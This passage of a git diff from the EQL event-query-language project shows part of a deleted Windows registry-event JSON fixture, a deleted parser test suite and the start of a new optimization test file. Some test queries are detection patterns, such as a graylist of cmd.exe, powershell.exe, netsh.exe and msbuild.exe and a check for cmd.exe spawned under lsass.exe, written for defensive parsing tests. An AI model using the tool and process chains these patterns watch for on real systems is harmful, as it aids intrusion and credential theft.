"svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\VFUProvider", - "registry_value": "VFUProvider", - "timestamp": 131883574200270000, - "unique_pid": "{42FC7E13-B2AE-5C05-0000-0010A4060200}" - }, - { - "event_type": "registry", - "pid": 2712, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\VFUProvider", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\VFUProvider\\StartTime", - "registry_value": "StartTime", - "timestamp": 131883574200270000, - "unique_pid": "{42FC7E13-B2AE-5C05-0000-0010A4060200}" - }, - { - "event_type": "registry", - "pid": 4516, - "process_name": "ctfmon.exe", - "process_path": "C:\\WINDOWS\\system32\\ctfmon.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Input", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Input\\Locales", - "registry_value": "Locales", - "timestamp": 131883574216680000, - "unique_pid": "{42FC7E13-B2C7-5C05-0000-001046BF0300}" - }, - { - "event_type": "registry", - "pid": 4744, - "process_name": "Explorer.EXE", - "process_path": "C:\\WINDOWS\\Explorer.EXE", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\Count\\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\\JvaqbjfCbjreFuryy\\i1.0", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\Count\\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\\JvaqbjfCbjreFuryy\\i1.0\\cbjrefuryy.rkr", - "registry_value": "cbjrefuryy.rkr", - "timestamp": 131883574216680000, - "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" - }, - { - "event_type": "registry", - "pid": 4744, - "process_name": "Explorer.EXE", - "process_path": "C:\\WINDOWS\\Explorer.EXE", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\Count", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\Count\\HRZR_PGYFRFFVBA", - "registry_value": "HRZR_PGYFRFFVBA", - "timestamp": 131883574216680000, - "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" - }, - { - "event_type": "registry", - "pid": 4516, - "process_name": "ctfmon.exe", - "process_path": "C:\\WINDOWS\\system32\\ctfmon.exe", - "registry_key": "HKLM", - "registry_path": "HKLM\\SOFTWARE", - "registry_value": "SOFTWARE", - "timestamp": 131883574216830000, - "unique_pid": "{42FC7E13-B2C7-5C05-0000-001046BF0300}" - }, - { - "event_type": "registry", - "pid": 4516, - "process_name": "ctfmon.exe", - "process_path": "C:\\WINDOWS\\system32\\ctfmon.exe", - "registry_key": "HKLM\\SOFTWARE", - "registry_path": "HKLM\\SOFTWARE\\Microsoft", - "registry_value": "Microsoft", - "timestamp": 131883574216830000, - "unique_pid": "{42FC7E13-B2C7-5C05-0000-001046BF0300}" - }, - { - "event_type": "registry", - "pid": 4516, - "process_name": "ctfmon.exe", - "process_path": "C:\\WINDOWS\\system32\\ctfmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Input", - "registry_value": "Input", - "timestamp": 131883574216830000, - "unique_pid": "{42FC7E13-B2C7-5C05-0000-001046BF0300}" - }, - { - "event_type": "registry", - "pid": 4744, - "process_name": "Explorer.EXE", - "process_path": "C:\\WINDOWS\\Explorer.EXE", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ApplicationViewManagement", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ApplicationViewManagement\\W32:00000000000B053C", - "registry_value": "W32:00000000000B053C", - "timestamp": 131883574217619984, - "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" - }, - { - "event_type": "registry", - "pid": 4744, - "process_name": "Explorer.EXE", - "process_path": "C:\\WINDOWS\\Explorer.EXE", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ApplicationViewManagement\\W32:00000000000B053C", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ApplicationViewManagement\\W32:00000000000B053C\\VirtualDesktop", - "registry_value": "VirtualDesktop", - "timestamp": 131883574217619984, - "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" - } -] \ No newline at end of file diff --git a/tests/test_eql.py b/tests/test_eql.py deleted file mode 100644 index f73bc23..0000000 --- a/tests/test_eql.py +++ /dev/null @@ -1,697 +0,0 @@ -"""Test case.""" -import datetime -import os -import sys -import traceback -import unittest -from collections import OrderedDict - -from eql.ast import * # noqa -from eql.engines.base import BaseEngine, TextEngine -from eql.errors import ParseError, SchemaError -from eql.parser import ( - parse_query, parse_expression, parse_definition, parse_definitions, parse_analytic, get_preprocessor -) -from eql.schema import use_schema - - -class TestEql(unittest.TestCase): - """Test EQL parsing.""" - - def test_abstract_methods(self): - """Test that abstract methods are raising exceptions.""" - node = EqlNode() - self.assertRaises(NotImplementedError, node.render) - - macro = BaseMacro("name") - self.assertRaises(NotImplementedError, macro.expand, []) - - def test_invalid_ast(self): - """Test that invalid ast nodes raise errors.""" - self.assertRaises(AssertionError, Literal, True) - self.assertRaises(AssertionError, Literal, dict()) - self.assertRaises(AssertionError, Literal, list()) - self.assertRaises(AssertionError, Literal, complex()) - self.assertRaises(AssertionError, Literal, object()) - self.assertRaises(AssertionError, Literal, lambda: None) - self.assertRaises(AssertionError, Literal, object) - - def test_literals(self): - """Test that literals are parsed correctly.""" - eql_literals = [ - ('true', True, Boolean), - ('false', False, Boolean), - ('100', 100, Number), - ('1.5', 1.5, Number), - ('.6', .6, Number), - ('-100', -100, Number), - ('-15.24', -15.24, Number), - ('"100"', "100", String), - ('null', None, Null), - ] - for text, expected_value, expected_type in eql_literals: - node = parse_expression(text) - rendered = node.render() - re_parsed = parse_expression(rendered) - self.assertIsInstance(node, expected_type) - self.assertEqual(node.value, expected_value) - self.assertEqual(node, re_parsed) - - def test_valid_expressions(self): - """Test that expressions are parsed correctly.""" - valid = [ - "1 == 1", - "1 == (1 == 1)", - 'abc != "ghi"', - "abc > 20", - "f()", - "somef(a,b,c,d,)", - "a in (1,2,3,4,)", - "f(abc) < g(hij)", - "f(f(f(f(abc))))", - 'abc == f()', - 'f() and g()', - "1", - '(1)', - "true", - "false", - "null", - "not null", - "abc", - '"string"', - 'abc and def', - '(1==abc) and def', - 'abc == (1 and 2)', - 'abc == (def and 2)', - 'abc == (def and def)', - 'abc == (def and ghi)', - '"\\b\\t\\r\\n\\f\\\\\\"\\\'"', - ] - - for query in valid: - parse_expression(query) - - def test_functions(self): - """Test that functions are being parsed correctly.""" - # Make sure that functions are parsing all arguments - fn = parse_expression('somefunction(' - ' a and c,' - ' false,' - ' d or g' - ')') - self.assertIsInstance(fn, FunctionCall) - self.assertEqual(len(fn.arguments), 3) - - def test_invalid_expressions(self): - """Test that expressions are parsed correctly.""" - invalid = [ - 'a xor b', # made up comparator - 'def[ghi]', # index not a number - 'def[-1]', # negative indexes not supported - 'someFunc().abc', # can't index these - '1.2.3', # invalid number - 'a.1', - '()', # nothing inside - '', - '"invalid"string"', - '--100', - '1000 100', - '"" 100', - # literal values as fields - 'true.100', - 'null.abc', - 'abc[0].null', - # require escape slashes, - '\\R', - '\\W', - ] - - keywords = [ - 'and', 'by', 'in', 'join', 'macro', 'not', 'of', 'or', 'sequence', 'until', 'where', 'with' - ] - - for query in invalid: - self.assertRaises(ParseError, parse_expression, query) - - for keyword in keywords: - self.assertRaises(ParseError, parse_expression, keyword) - parse_expression(keyword.upper()) - - def test_valid_queries(self): - """Make sure that EQL queries are properly parsed.""" - valid = [ - 'file where true', - 'file where true and true', - 'file where false or true', - 'registry where not pid', - 'process where process_name == "net.exe" and command_line == "* user*.exe"', - 'process where command_line == "~!@#$%^&*();\'[]{}\\\\|<>?,./:\\"-= \' "', - 'process where \n\n\npid ==\t 4', - 'process where process_name in ("net.exe", "cmd.exe", "at.exe")', - 'process where command_line == "*.exe *admin*" or command_line == "* a b*"', - 'process where pid in (1,2,3,4,5,6,7,8) and abc == 100 and def == 200 and ghi == 300 and jkl == x', - 'process where ppid != pid', - 'image_load where not x != y', - 'image_load where not x == y', - 'image_load where not not not not x < y', - 'image_load where not x <= y', - 'image_load where not x >= y', - 'image_load where not x > y', - 'process where pid == 4 or pid == 5 or pid == 6 or pid == 7 or pid == 8', - 'network where pid == 0 or pid == 4 or (ppid == 0 or ppid = 4) or (abc == defgh) and process_name == "*" ', - 'network where pid = 4', - 'process where descendant of [process where process_name == "lsass.exe"] and process_name == "cmd.exe"', - 'join \t\t\t[process where process_name == "*"] [ file where file_path == "*"\n]', - 'join by pid [process where name == "*"] [file where path == "*"] until [process where opcode == 2]', - 'sequence [process where name == "*"] [file where path == "*"] until [process where opcode == 2]', - 'sequence by pid [process where name == "*"] [file where path == "*"] until [process where opcode == 2]', - 'join [process where process_name == "*"] by process_path [file where file_path == "*"] by image_path', - 'sequence [process where process_name == "*"] by process_path [file where file_path == "*"] by image_path', - 'sequence by pid [process where process_name == "*"] [file where file_path == "*"]', - 'sequence by pid with maxspan=200 [process where process_name == "*" ] [file where file_path == "*"]', - 'sequence by pid with maxspan=2s [process where process_name == "*" ] [file where file_path == "*"]', - 'sequence by pid with maxspan=2sec [process where process_name == "*" ] [file where file_path == "*"]', - 'sequence by pid with maxspan=2seconds [process where process_name == "*" ] [file where file_path == "*"]', - 'sequence with maxspan=2.5m [process where x == x] by pid [file where file_path == "*"] by ppid', - 'sequence by pid with maxspan=2.0h [process where process_name == "*"] [file where file_path == "*"]', - 'sequence by pid with maxspan=2.0h [process where process_name == "*"] [file where file_path == "*"]', - 'sequence by pid with maxspan=1.0075d [process where process_name == "*"] [file where file_path == "*"]', - 'dns where pid == 100 | head 100 | tail 50 | unique pid', - 'network where pid == 100 | unique command_line | count', - 'security where user_domain == "endgame" | count user_name a b | tail 5', - 'process where 1==1 | count user_name, unique_pid, myFn(field2,a,bc)', - 'process where 1==1 | unique user_name, myFn(field2,a,bc), field2', - 'registry where a.b', - 'registry where a[0]', - 'registry where a.b.c.d.e', - 'registry where a.b.c[0]', - 'registry where a[0].b', - 'registry where a[0][1].b', - 'registry where a[0].b[1]', - 'registry where topField.subField[100].subsubField == 0', - 'process where true | filter true', - 'process where 1==1 | filter abc == def', - 'process where 1==1 | filter abc == def and 1 != 2', - 'process where 1==1 | count process_name | filter percent > 0.5', - 'process where a > 100000000000000000000000000000000', - 'any where true | unique a b c | sort a b c | count', - 'any where true | unique a, b, c | sort a b c | count', - 'any where true | unique a, b, c | sort a,b,c | count', - 'any where true | window 5s | unique a, b | unique_count a | filter count > 5', - 'file where child of [registry where true]', - 'file where event of [registry where true]', - 'file where event of [registry where true]', - 'file where descendant of [registry where true]', - # multiple by values - 'sequence by field1 [file where true] by f1 [process where true] by f1', - 'sequence by a,b,c,d [file where true] by f1,f2 [process where true] by f1,f2', - 'sequence [file where 1] by f1,f2 [process where 1] by f1,f2 until [process where 1] by f1,f2', - 'sequence by f [file where true] by a,b [process where true] by c,d until [process where 1] by e,f', - # sequence with named params - 'sequence by unique_pid [process where true] [file where true] fork', - 'sequence by unique_pid [process where true] [file where true] fork=true', - 'sequence by unique_pid [process where true] [file where true] fork=1', - 'sequence by unique_pid [process where true] [file where true] fork=false', - 'sequence by unique_pid [process where true] [file where true] fork=0 [network where true]', - 'sequence by unique_pid [process where true] [file where true] fork=0', - ] - - datetime.datetime.now() - - for i, text in enumerate(valid): - try: - query = parse_query(text) - rendered = query.render() - self.assertEqual(text.split()[0], rendered.split()[0]) - - # parse it again to make sure it's still valid and doesn't change - parse_again = parse_query(rendered) - rendered_again = parse_again.render() - - # repr + eval should also restore it properly - # Test that eval + repr works - actual_repr = repr(query) - eval_actual = eval(actual_repr) - - self.assertEqual(query, parse_again, "Query didn't reparse correctly.") - self.assertEqual(rendered, rendered_again) - self.assertEqual(query, eval_actual) - - except ParseError: - ex_type, ex, tb = sys.exc_info() - traceback.print_exc(ex) - traceback.print_tb(tb) - self.fail("Unable to parse query #{}: {}".format(i, text)) - - def test_invalid_schema(self): - """Test that schema errors are being raised separately.""" - invalid = [ - 'fakeNews where president == "russia"', - 'PROCESS where process_name == "bad.exe"', - 'Process where process_name == "bad.exe"', - 'file_ where process_name == "bad.exe"', - ] - for query in invalid: - self.assertRaises(SchemaError, parse_query, query) - - def test_invalid_queries(self): - """Test that invalid queries throw the proper error.""" - invalid = [ - 'process where process_name == "abc.exe" garbage extraneous \"input\"', - 'garbage process where process_name < "abc.e"xe"', - 'process', - 'process where abc == "extra"quote"', - 'file where and', - 'file where file_name and', - 'file_name and', - 'file_name )', - 'file_name (\r\n\r\n', - 'file_name where (\r\n\r\n)', - 'process where _badSymbol == 100', - 'process where 1field == 2field', - 'sequence where 1field == 2field', - 'process where true | filter', - 'process where true | badPipe', - 'process where true | badPipe a b c', - 'process where true | head -100', - 'process where descendant of []', - 'any where true | window | unique_count a, b', - 'any where true | window a | unique_count a, b', - 'file where nothing of [process where true]', - 'file where DescenDant of [process where true]', - 'garbage', - 'process where process_name == "abc.exe" | count 100', - 'process where process_name == "abc.exe" | unique 100', - 'process where process_name == "abc.exe" | sort 100', - 'process where process_name == "abc.exe" | head 100 abc', - 'process where process_name == "abc.exe" | head abc', - 'process where process_name == "abc.exe" | head abc()', - 'process where process_name == "abc.exe" | head abc(def, ghi)', - 'sequence [process where pid == pid]', - 'sequence [process where pid == pid] []', - 'sequence with maxspan=false [process where true] [process where true]', - 'sequence with badparam=100 [process where true] [process where true]', - # check that the same number of BYs are in every subquery - 'sequence [file where true] [process where true] by field1', - 'sequence [file where true] by field [file where true] by field1 until [file where true]', - 'sequence by a,b,c [file where true] by field [file where true] by field1 until [file where true]', - 'sequence [file where 1] by field [file where 1] by f1 until [file where 1] by f1,f2 | unique field', - 'sequence [process where 1] fork=true [network where 1]', - 'sequence [process where 1] [network where 1] badparam=true', - 'sequence [process where 1] [network where 1] fork=true fork=true', - 'sequence [process where 1] [network where 1] fork fork', - 'process where descendant of [file where true] bad=param', - '| filter true' - ] - for query in invalid: - self.assertRaises(ParseError, parse_query, query) - - macro_definitions = """ - macro A_OR_B(a,b) - a or b - - macro XOR(a,b) - A_OR_B(a and not b, b and not a) - - macro IN_GRAYLIST(proc) - proc in ( - "msbuild.exe", - "powershell.exe", - "cmd.exe", - "netsh.exe" - ) - - macro PROCESS_IN_GRAYLIST() - IN_GRAYLIST(process_name) - - macro PARENT_XOR_CHILD_IN_GRAYLIST() - XOR(IN_GRAYLIST(process_name), IN_GRAYLIST(parent_process_name)) - - macro DESCENDANT_OF_PROC(expr) - descendant of [process where opcode==1 and expr] - """ - - def test_macro_expansion(self): - """Test EQL custom macros.""" - expanded = { - "A_OR_B": "a or b", - "XOR": "(a and not b) or (b and not a)", - "IN_GRAYLIST": 'proc in ("msbuild.exe", "powershell.exe", "cmd.exe", "netsh.exe")', - "PROCESS_IN_GRAYLIST": 'process_name in ("msbuild.exe", "powershell.exe", "cmd.exe", "netsh.exe")', - "PARENT_XOR_CHILD_IN_GRAYLIST": ( - '( ' - ' process_name in ("msbuild.exe", "powershell.exe", "cmd.exe", "netsh.exe") and not ' - ' parent_process_name in ("msbuild.exe", "powershell.exe", "cmd.exe", "netsh.exe")' - ') or (' - ' parent_process_name in ("msbuild.exe", "powershell.exe", "cmd.exe", "netsh.exe") and not ' - ' process_name in ("msbuild.exe", "powershell.exe", "cmd.exe", "netsh.exe")' - ')' - ), - 'DESCENDANT_OF_PROC': 'descendant of [process where opcode == 1 and expr]' - } - - macros = parse_definitions(self.macro_definitions) - lookup = OrderedDict() - - for macro in macros: - lookup[macro.name] = macro - rendered = macro.render() - macro_copy = parse_definition(rendered) - self.assertEqual(macro, macro_copy) - self.assertEqual(rendered, macro_copy.render(), "Macro doesn't render valid EQL.") - - # Now load up each macro to the engine - engine = PreProcessor(macros) - - # Confirm that nested macros are expanded appropriately - for name, macro in engine.macros.items(): - if name == 'safePath': - continue - expected_expr = parse_expression(expanded[name]) - self.assertEqual(macro.expression, expected_expr) - self.assertEqual(macro.expression.render(), expected_expr.render()) - - # Expand some EQL queries - queries = [ - ('process where DESCENDANT_OF_PROC(process_name="explorer.exe")', - 'process where descendant of [process where opcode=1 and process_name == "explorer.exe"]' - ), - ('process where XOR(a=="b", c=="d")', - 'process where ((a == "b") and not (c == "d")) or ((c == "d") and not (a == "b"))' - ), - ('file where true', - 'file where true', - ), - ('process where opcode=1 and PROCESS_IN_GRAYLIST()', - 'process where opcode==1 and process_name in ("msbuild.exe","powershell.exe","cmd.exe","netsh.exe")' - ), - ] - - for query, expanded_query in queries: - before_node = parse_query(query) - actual = engine.expand(before_node) - expected = parse_query(expanded_query) - - # Test that eval + repr works - actual_repr = repr(actual) - eval_actual = eval(actual_repr) - - self.assertEqual(actual, expected) - self.assertEqual(eval_actual, actual) - self.assertTrue(actual == expected) - self.assertFalse(actual != expected) - error_msg = "'{}' expanded to '{}' instead of '{}'".format(query, actual.render(), expected.render()) - self.assertEqual(actual.render(), expected.render(), error_msg) - - query = parse_expression("DESCENDANT_OF_PROC()") - self.assertRaisesRegexp(ValueError, "Macro .+ expected \d+ arguments .*", engine.expand, query) - - query = parse_expression("DESCENDANT_OF_PROC(1,2,3)") - self.assertRaisesRegexp(ValueError, "Macro .+ expected \d+ arguments .*", engine.expand, query) - - def test_engine_schema(self): - """Test loading the engine with a custom schema.""" - queries = [ - 'movie where name == "*Breakfast*" and IN_80s(release)', - 'person where name == "John Hughes"', - ] - - analytic_dicts = [{'query': q} for q in queries] - definitions = """ - macro IN_80s(date) date == "*/*/1980" - """ - - config = { - 'schema': {'event_types': {'movie': 1, 'person': 2}}, - 'definitions': parse_definitions(definitions), - 'analytics': analytic_dicts - } - - pp = PreProcessor() - pp.add_definitions(config['definitions']) - - with use_schema(config['schema']): - expected = [parse_analytic(d, preprocessor=pp) for d in analytic_dicts] - - engine = BaseEngine(config) - with use_schema(engine.schema): - engine.add_analytics([parse_analytic(d) for d in analytic_dicts]) - - self.assertListEqual(engine.analytics, expected, "Analytics were not loaded and expanded properly.") - - def test_custom_macro(self): - """Test python custom macro expansion.""" - def optimize_length(args, walker): - arg, = args # only 1 allowed - if isinstance(arg, String): - return Number(len(arg.value)) - else: - return FunctionCall('length', [arg]) - - macro = CustomMacro('LENGTH', optimize_length) - engine = PreProcessor([macro]) - - example = parse_query('process where LENGTH("python.exe") == LENGTH(process_name)') - expected = parse_query('process where 10 == length(process_name)') - - output = engine.expand(example) - self.assertEqual(output, expected, "Custom macro LENGTH was not properly expanded") - - example = parse_query('process where LENGTH("abc", "def")') - self.assertRaisesRegexp(ValueError, "too many values to unpack", engine.expand, example) - - def test_load_definitions_from_file(self): - """Test loading definitions from a file.""" - filename = 'example-definitions.eql.tmp' - config = {'definitions_files': [filename]} - with open(filename, 'w') as f: - f.write(self.macro_definitions) - engine = TextEngine(config) - os.remove(filename) - self.assertGreater(len(engine.preprocessor.macros), 0, "Definitions failed to load") - - def test_mixed_definitions(self): - """Test that macro and constant definitions can be loaded correctly.""" - defn = parse_definitions(""" - const magic = 100 - macro OR(a, b) a or b - """) - pp = PreProcessor(defn) - - # Confirm that copy and adding is working - pp2 = pp.copy() - pp.add_definition(parse_definition("macro ABC(a, b, c) error_error_error")) - pp2.add_definition(parse_definition("macro ABC(a, b, c) f(a, magic, c)")) - - matches = [ - ("abc", "abc"), - ("OR(x, y)", "x or y"), - ("magic", "100"), - ("ABC(0,1,2)", "f(0, 100, 2)"), - ] - for before, after in matches: - before = parse_expression(before) - after = parse_expression(after) - self.assertEqual(pp2.expand(before), after) - - def test_static_value_optimizations(self): - """Test parser optimizations for comparing static values.""" - expected_true = [ - '10 == 10', - '10 == 10.0', - '"abc" == "abc"', - 'true == true', - 'true != false', - 'true != 100', - '100 != "abc"', - '"" == ""', - '"" == "*"', - '"aaaaa" == "*"', - '100 != "*abcdef*"', - '"abc" == "*abc*"', - '"abc" == "*ABC*"', - '"ABC" == "*abc*"', - '"abc" != "d*"', - '"net view" == "net* view*"', - '"net view" == "net* view"', - '"net view view" == "net* view"', - '"net view " == "net* VIEW*"', - '"Net!!! VIEW view net view" == "net* view*"', - 'not "Net!!! VIEW view net view" != "net* view*"', - '"Newww!!! VIEW view net view" != "net* view*"', - '1 < 2', - '1 <= 2', - '2 <= 2', - '1 <= 1.0', - '1.0 <= 1', - '2 > 1', - '2 >= 1', - '2 >= 2', - '2 != 1', - '"ABC" <= "ABC"', - "length('abcdefg') == 7", - "100 in (1, 2, 3, 4, 100, 105)", - "'rundll' in (1, 2, 3, abc.def[100], 'RUNDLL', false)", - "not 'rundll' in (1, 2, 3, '100', 'nothing', false)", - ] - - for expression in expected_true: - ast = parse_expression(expression) - self.assertIsInstance(ast, Boolean, 'Failed to optimize {}'.format(expression)) - self.assertTrue(ast.value, 'Parser did not evaluate {} as true'.format(expression)) - - expected_false = [ - '100 = "a"', - '"b" == "a"', - '1 == 2', - '1 > 2', - '5 <= -3', - '"ABC" = "abcd"', - '"ABC*DEF" == " ABC DEF "', - '1 == "*"', - '"abc" > "def"', - '"abc" != "abc"', - ] - - for expression in expected_false: - ast = parse_expression(expression) - self.assertIsInstance(ast, Boolean, 'Failed to optimize {}'.format(expression)) - self.assertFalse(ast.value, 'Parser did not evaluate {} as false'.format(expression)) - - expression = '"something" in ("str", "str2", "str3", "str4", someField)' - optimized = '"something" == someField' - self.assertEqual(parse_expression(expression), parse_expression(optimized)) - - expression = '"something" in ("str", "str2", "str3", "str4", field1, field2)' - optimized = '"something" in (field1, field2)' - self.assertEqual(parse_expression(expression), parse_expression(optimized)) - - def test_query_events(self): - """Test that event queries work with events[n].* syntax in pipes.""" - base_queries = ['abc', 'abc[123]', 'abc.def.ghi', 'abc.def[123].ghi[456]'] - for text in base_queries: - field_query = parse_expression(text) # type: Field - events_query = parse_expression('events[0].' + text) # type: Field - - index, query = field_query.query_multiple_events() - self.assertEqual(index, 0, "Didn't query from first event") - self.assertEqual(query, field_query, "Didn't unconvert query") - - index, query = events_query.query_multiple_events() - self.assertEqual(index, 0, "Didn't query from first event") - self.assertEqual(query, field_query, "Didn't unconvert query") - - for event_index, text in enumerate(base_queries): - events_text = 'events[{}].{}'.format(event_index, text) - field_query = parse_expression(text) # type: Field - events_query = parse_expression(events_text) # type: Field - index, query = events_query.query_multiple_events() - self.assertEqual(index, event_index, "Didn't query from {} event".format(event_index)) - self.assertEqual(query, field_query, "Didn't unconvert query") - - def test_parse_with_preprocessor(self): - """Test that preprocessor works with the parser.""" - preprocessor = get_preprocessor(""" - const ABC = 123 - const DEF = 456 - const GHI = 123 - - macro COMPARE_TWO(a, b) a == b - macro GET_TRUE(a) COMPARE_TWO(a, a) - """) - - def p(text): - return parse_expression(text, preprocessor=preprocessor) - - self.assertEqual(p('ABC'), Number(123)) - self.assertEqual(p('COMPARE_TWO(some_field, "abc.exe")'), p('some_field == "abc.exe"')) - self.assertEqual(p('COMPARE_TWO(105, 105)'), Boolean(True)) - self.assertEqual(p('GET_TRUE(100)'), Boolean(True)) - - # now double up - double_pp = get_preprocessor(""" - macro TRUE() GET_TRUE(105) - macro FALSE() not TRUE() - """, preprocessor=preprocessor) - - def pp(text): - return parse_expression(text, preprocessor=double_pp) - - self.assertEqual(pp('ABC'), Number(123)) - self.assertEqual(pp('TRUE()'), Boolean(True)) - self.assertEqual(pp('FALSE()'), Boolean(False)) - self.assertEqual(pp('not FALSE()'), Boolean(True)) - - def test_set_optimizations(self): - """Test that set unions, intersections, etc. are correct.""" - duplicate_values = parse_expression('fieldname in ("a", "b", "C", "d", 1, "d", "D", "c")') - no_duplicates = parse_expression('fieldname in ("a", "b", "C", "d", 1)') - self.assertEqual(duplicate_values, no_duplicates, "duplicate values were not removed") - - two_sets = parse_expression('fieldname in ("a", "b", "C", "x") and fieldname in ("d", "c", "g", "X")') - intersection = parse_expression('fieldname in ("C", "x")') - self.assertEqual(two_sets, intersection, "intersection test failed") - - two_sets = parse_expression('(fieldname in ("a", "b", "C", "x")) and fieldname in ("d", "f", "g", 123)') - self.assertEqual(two_sets, Boolean(False), "empty intersection test failed") - - two_sets = parse_expression('fieldname in ("a", "b", "C", "x") or fieldname in ("d", "c", "g", "X")') - union = parse_expression('fieldname in ("a", "b", "C", "x", "d", "g")') - self.assertEqual(two_sets, union, "union test failed") - - literal_check = parse_expression('"ABC" in ("a", "ABC", "C")') - self.assertEqual(literal_check, Boolean(True), "literal comparison failed") - - literal_check = parse_expression('"def" in ("a", "ABC", "C")') - self.assertEqual(literal_check, Boolean(False), "literal comparison failed") - - dynamic_values = parse_expression('"abc" in ("a", "b", fieldA, "C", "d", fieldB, fieldC)') - no_duplicates = parse_expression('"abc" in (fieldA, fieldB, fieldC)') - self.assertEqual(dynamic_values, no_duplicates, "literal values were not removed") - - dynamic_values = parse_expression('fieldA in ("a", "b", "C", "d", fieldA, fieldB, fieldC)') - self.assertEqual(dynamic_values, Boolean(True), "dynamic set lookup not optimized") - - def test_comments(self): - """Test that comments are valid syntax but stripped from AST.""" - match = parse_query("process where pid=4 and ppid=0") - - query = parse_query("""process where pid = 4 /* multi\nline\ncomment */ and ppid=0""") - self.assertEqual(match, query) - - query = parse_query("""process where pid = 4 // something \n and ppid=0""") - self.assertEqual(match, query) - - query = parse_query("""process where pid - = 4 and ppid=0 - """) - self.assertEqual(match, query) - - query = parse_query("""process where - // test - // - //line - //comments - pid = 4 and ppid = 0 - """) - self.assertEqual(match, query) - - match = parse_expression("true") - query = parse_expression("true // something else \r\n /* test\r\n something \r\n*/") - self.assertEqual(match, query) - - commented = parse_definitions("macro test() pid = 4 and /* comment */ ppid = 0") - macro = parse_definitions("macro test() pid = 4 and ppid = 0") - self.assertEqual(commented, macro) - - def test_invalid_comments(self): - """Test that invalid/overlapping comments fail.""" - query_text = "process where /* something */ else */ true" - self.assertRaises(ParseError, parse_query, query_text) - - # Test nested comments (not supported) - query_text = "process where /* outer /* nested */ outer */ true" - self.assertRaises(ParseError, parse_query, query_text) - - query_text = "process where // true" - self.assertRaises(ParseError, parse_query, query_text) diff --git a/tests/test_optimizations.py b/tests/test_optimizations.py new file mode 100644 index 0000000..67172b4 --- /dev/null +++ b/tests/test_optimizations.py @@ -0,0 +1,168 @@ +"""Tests for optimization of syntax trees.""" +import unittest + +from eql.ast import * # noqa: F403 +from eql.parser import parse_expression + + +class TestParseOptimizations(unittest.TestCase): + """Tests that the parser returns optimized syntax trees.""" + + def test_set_static_optimizations(self): + """Check that checks for static fields in sets return optimized ASTs.""" + expression = '"something" in ("str", "str2", "str3", "str4", someField)' + optimized = '"something" == someField' + self.assertEqual(parse_expression(expression), parse_expression(optimized)) + + expression = '"something" in ("str", "str2", "str3", "str4", field1, field2)' + optimized = '"something" in (field1, field2)' + self.assertEqual(parse_expression(expression), parse_expression(optimized)) + + def test_set_optimizations(self): + """Test that set unions, intersections, etc. are correct.""" + duplicate_values = parse_expression('fieldname in ("a", "b", "C", "d", 1, "d", "D", "c")') + no_duplicates = parse_expression('fieldname in ("a", "b", "C", "d", 1)') + self.assertEqual(duplicate_values, no_duplicates, "duplicate values were not removed") + + two_sets = parse_expression('fieldname in ("a", "b", "C", "x") and fieldname in ("d", "c", "g", "X")') + intersection = parse_expression('fieldname in ("C", "x")') + self.assertEqual(two_sets, intersection, "intersection test failed") + + two_sets = parse_expression('(fieldname in ("a", "b", "C", "x")) and fieldname in ("d", "f", "g", 123)') + self.assertEqual(two_sets, Boolean(False), "empty intersection test failed") + + two_sets = parse_expression('fieldname in ("a", "b", "C", "x") or fieldname in ("d", "c", "g", "X")') + union = parse_expression('fieldname in ("a", "b", "C", "x", "d", "g")') + self.assertEqual(two_sets, union, "union test failed") + + literal_check = parse_expression('"ABC" in ("a", "ABC", "C")') + self.assertEqual(literal_check, Boolean(True), "literal comparison failed") + + literal_check = parse_expression('"def" in ("a", "ABC", "C")') + self.assertEqual(literal_check, Boolean(False), "literal comparison failed") + + dynamic_values = parse_expression('"abc" in ("a", "b", fieldA, "C", "d", fieldB, fieldC)') + no_duplicates = parse_expression('"abc" in (fieldA, fieldB, fieldC)') + self.assertEqual(dynamic_values, no_duplicates, "literal values were not removed") + + dynamic_values = parse_expression('fieldA in ("a", "b", "C", "d", fieldA, fieldB, fieldC)') + self.assertEqual(dynamic_values, Boolean(True), "dynamic set lookup not optimized") + + and_not = parse_expression('NAME in 